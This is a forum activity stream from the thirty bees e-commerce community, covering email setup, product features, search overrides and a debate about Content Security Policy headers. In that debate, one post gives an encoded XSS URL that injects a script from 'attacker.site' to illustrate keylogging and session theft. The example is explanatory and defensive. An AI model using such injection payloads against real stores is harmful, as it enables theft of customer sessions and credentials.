Jump to content

Welcome, Guest!

By registering with us, you'll be able to discuss, share and private message with other members of our community.

All Activity

This stream auto-updates     

  1. Yesterday
  2. THANK YOU! Changing the email in Preferences > Store Contacts solved the problem. I had it as my outlook.com email as that's where I wanted to receive emails at, but changing it to my custom domain worked like a charm.
  3. My wishes: - An option to start an attribute combination with “select a” instead of a default value. I know this is a template job... - Option to automatically hide categories without products or subcategories with products. You have now modules that do such a thing. But the problem is that while they disable you have to re-enable yourself. - Option to disable combinations. - Auto-save for customizations - Option to include attachments in messages to customers - And finally the big fish: a solution for the combination problems. There are several situations where the Prestashop combination structure gives problems: - with too many combinations everything becomes slow - some attributes don't influence stock - some attributes have their own stock The solution that seems the most feasible to me at the moment is the following: - you need an additional table. Let's call it product-addons. - a product-addon can be either a product or an attribute. If you need stock keeping you use a product. A product can be set to be used in this function only. - the attribute table is expanded with a weight and a price field - an addon product can have attribute combinations. If there is more than one attribute the combinations will be merged into a single select menu ("carpet size:large; color:red"). If an addon product has product-addons itself they will be ignored. - addon products without combinations and single value attribute groups will be displayed as checkboxes. - I hope there is some possibility to insert those extra fields with hooks in templates that don't support them. - the category_product table will need an extra field for the product-addons. In the order_detail table the information can be part of the name field.
  4. Hello As far as I understood the point is to mitigate what I think that can be called the "third man in the middle attack", I think that Datakick's examples are pretty much pertinent and self explanatory, using these headers and in particular CSP makes it more difficult. From a non expert point of view as mine is it appears anyway quite clear and logical that when the server and the browser are instructed to not accept "things" coming from sources that are not expressly declared as legit can sensibly reduce the possibility for anyone to inject on the fly instructions to deviate the client toward a malicious server and receive deceptive data or vice versa. I understand that the use of these headers makes the whole work of the developer/implementer/merchant all more difficult and also costly, however, while of course as a principle is always good to try to patch everything in the software used it is also as well always good as a principle to try to patch everything else that gets in relation with the software used, thus I think that hardening the methods with which the client server communication happens is just logic and a better practice. As a matter of fact 100% security is maybe never achievable, but the harder is to get around security protocols the better are the chances that an attacker fails, so why not at least try to implement all what is reasonably possible to do? The CSP rule I did set is extra permissive, I also use the mod_security using WAF rules from Comodo, at the moment almost everything seems to work well, I need to study more on this and I will report here my findings, anyone interested please participate to this initiative, it would be very good to find out the proper "recipe" to have a good CSP policy that works fine with TB. Thank you Best regards
  5. It looks like thirty bees successfully relayed the email to the email delivery software, since there is log entry about this. If the email is not delivered, it can be for various reasons, none of them are tb related 🙂 This often happen when are trying to send email from address that does not allow your server to act as an origin. Other servers will put that email to spambox, or simply drop it. Check your Shop email address in Preferences > Store Contacts, and ensure your server has rights to send email on behalf of that address. Since you already have testing php application for sending emails, you can test it there -- edit it, and use Shop Email address as a 'from' address, and see if the email is delivered. If it is not delivered, then investigate SPF and DKIM associated with domain of this from address.
  6. At the start, you can simply reuse the same functionality you already have for ps17, and assume all features have these two flags enabled.
  7. Thanks. I see that you allow settings per feature and you have also added a flag for custom values. Nice to see extra options compared to Prestashop. But I am I am not yet sure how easy it will be to implement for me.
  8. Last week
  9. I had to use phpmailer, as my server forbids me to use mail(). But you said you can use it from another script.
  10. Hello! I'm trying to set free shipping just for a carrier, starting from an amount of money (3000 in my case). I see there are two possibilities: 1) from carrier, setting two ranges, 0 to 3000 with the actual price and 3000 to inf with zero 2) setting a cart rule with a minimum of 3000, and setting just the carrier I want to give the free shipping. I think the second one is the best. I did it, and it shows free shipping but only just after buying, but not in the modal after adding to cart, nor in the summary. After adding a product that reaches 3000 the modal says: If I go to checkout: But, after clicking finish order the rule applies: Is it expected? the rule is applied only when finishing order, and not when adding products beyond my rule limit. Thanks!
  11. I still don't get it very well. In TB there is also possibility for "related products" where You can directly "bound" the base plate "or plates" for specific ubolt. No need to search anything. But maybe my english is not good enough to understand.
  12. Just to be thorough, here are all my PHP modules:
  13. Setup: ThirtyBees 1.2 PHP 7.4 MySQL I just installed ThirtyBees two days ago and I am working on getting my store setup. Of course, I want to receive email notifications when a customer places an order, comments on an order, or sends an email to customer service. Right now none of that is working. I have IMAP settings in the Customer Service tab, and it pulls messages fine from that. But when I reply the customer is not sent an email. Similarly, I'm not receiving any emails when things happen. All the emails show up in the Advanced Parameters > E-mail tab. In that tab, I have tried the "Test your Email Configuration" section but NEVER receive an email. I have tried using the PHP mail() function, doesn't work. But when I create a standard php page somewhere else on my server and go to it, the mail function works fine there. I have tried SMTP and that doesn't work either, but my SMTP settings are working and tested with the SMTP test website. I have enabled debug mode but don't see any error logs. And all I get are success notifications when I try to send a message (test or to the customer), never any error messages. There is also nothing in the error_log file. I've read this thread and this issue on GitHub, neither are my issue and they are on older versions (and I NEVER get any error messages). I guess I'm coming to my limit being able to do stuff in the UI, and not too familiar with the back-end. Installed using Softalicious on a CPanel server. I have all the appropriate PHP modules according to the README on the repo. Any help would be greatly appreciated. If someone thinks this would be better suited as a GitHub Issue then I will gladly put it there instead.
  14. Combinations is essentially about displaying different products where as this is more about the features of a single product. Features do not have any weight / price attributes For an example, we sell u-bolts and backing plates. Our backing plates have slotted holes rather than round holes. Now, if we consider a feature of ‘Distance between legs’ of the ubolt. Then for any given u-bolt that is fixed. We might have 1 ubolt with 50 mm between the legs another with 51 between the legs and another with 53 between the legs, etc Because the base plates have slotted rather than round holes, they can accommodate all three of those u-bolts, so the base plates need to have the feature ‘distance between legs’ of 50, 51, 52, 53 We then have filters (advanced search 4, or block layered navigation) on the base plate so that a customer can choose 50, 51, 52 or 53 and they will be directed to the single product
  15. JustaHippy

    1.2 and Paypal

    I see that the Paypal mod was not included in the 1.2 TB package, so i went to Github and snagged it. Things have not went well, so i assume this is why it wasn't included? It does not acknowledge my server as having TLSv1.2 that it does and everytime i hit save it throws a 500.
  16. Of course. Here you can see the db differeces: https://github.com/thirtybees/thirtybees/commit/ee852aef81420882a7a042e2d7978a790c8c37dd#diff-2a48baaddf0416cfb05978271a4ca9a83881e6f54ac663389063ba1d59c28135
  17. 🙂 It happens all the time. And it will continue to happen. It's just not possible to close all the holes in the core, themes, all the native or third party modules, or any third party software that can be installed alongside
  18. Of course I know how XSS works. This "somehow manages" simply must not happen. Neither originating from a browser, nor originating from elsewhere.
  19. Is there some flag in the database that indicates that multifeature? I would like to support it in Prestools like I do it for PS 1.7.3+. I assume other people building for Thirty Bees will face the same question.
  20. You apparently don't understand how XSS attack works. It's not the attacker that interact with the server, it's a third party user. If attacker somehow manage to inject javascript to the page that is rendered for different user, he can steal that user session, and do whatever he wants on behalf that poor user. This can be done, for example, by posting exploit link on public forum, or by directly sending link via email to some known server user. Once the user click on the link attacker gain access to his identity / session / cookies. This problem is much more severe in the back office, when attacker can act as an employee. They can trigger ajax calls to approve or create orders, change pricing of products, create new employee, or whatnot. At that point it is just a series well formed http requests. They can perform the same operations employee can. That's why store owner should never (or rarely) use admin profile. They should create and use different permission profile, to mitigate the risks. On front office XSS is not such a huge deal, but it is still a big problem. The attacker can impersonate the customer, and that can lead to serious issues. For example, I can imagine script that posts message via contact form and ask to ship last order to a different address. Shop owner will, of course, believe this message, because it came from logged-in customer. And they will send the goods to different address. This is a real problem, and CSP can help a lot. It's not silver bullet, of course, but nothing is.
  21. If hackers can work around a security measure by simply accessing the server directly, this measure is pointless. Maybe that's why I don't care much about such headers and turn my attention to safety of the code instead. That said, if these headers don't get into the way, it's fine to add them. Not too easy, because modules have a tendency to grab resources from about everywhere. Fonts, images, icons, some even call home.
  22. Thanks for the reply. There are far too many differences in the files for me to work out what would be needed. So probably best if I revert to the old practice of replacing the original file and just try to remember after every update
  23. It will be merged with tb core file, possibly causing conflicts. The more code override contains, the more friction it can cause. Just try to put the smallest amount of code that's needed. It will probably be just one or two methods, no more.
  24. After every TB update we have to revert search.php to an old PS 1.6 file as our SKU’s (reference code) contain special characters (*, -, / etc) and the current search cannot search properly This is becoming a faff which I tend to forget. I had a brainwave. I tried putting the whole old PS 1.6 search.php file into the overrides/classes folder and it seems to work Is that OK? adding a whole file as an override?
  25. Of course they improve security. They wouldn't exists otherwise. They are not intended to stop attackers interacting with the server directly, of course. But they are very useful for preventing cross site scripting, script injections, and similar attacks. Example scenario: Hacker will figure out that some query parameter on your server, say "&id_order=1", is displayed in the page without escaping and validating. Hacker can then create url to your server with this parameter containing javascript. Something like this: http://yourdomain.com/some/page?id_order%3D%3Cscript%20href%3D%22https%3A//attacker.site/malicious_script.js%22%3E This will insert <script src="https://atacker.site/malicious_script.js" /> to the page. And that's bad. The script can now do various things - listen to key strokes to figure out password of your customer. Submit ajax requests to submit orders on his behalf, or submit contact form to send spam emails. And who knows what else. By setting proper CSP on server this problem can be mitigated, to some extent. With strict CSP rules, browsers (the good one) will prevent this injection, and the user won't be affected. Of course, all such security holes must be fixed in the thirty bee code. But we can never be sure that we fixed all. We probably never will. Thus, having strict CSP would definitely help.
  26. Hello, Up to which Elasticsearch version would be suitable to use with this module in 2021 ? I'm currently trying to test this module with Thirtybees Bleeding Edge 1.3/Niara Theme and Nginx/PHP 7.3/Debian 10/Elasticsearch 7.12.0 and it appears to be promising a few comments : - i don't see a way to do a full reindex automatically (no url for CRON) - at the end of all result pages, i always have a "No results :(" line whereas it's not the case at all - Search facets appear (on left column) when you do a search from product page or category page but NOT from home/index page (because left column is disabled from theme page configuration) i wish it would be possible to "dock" search facets on the left à la doofinder.com (
  1. Load more activity
×
×
  • Create New...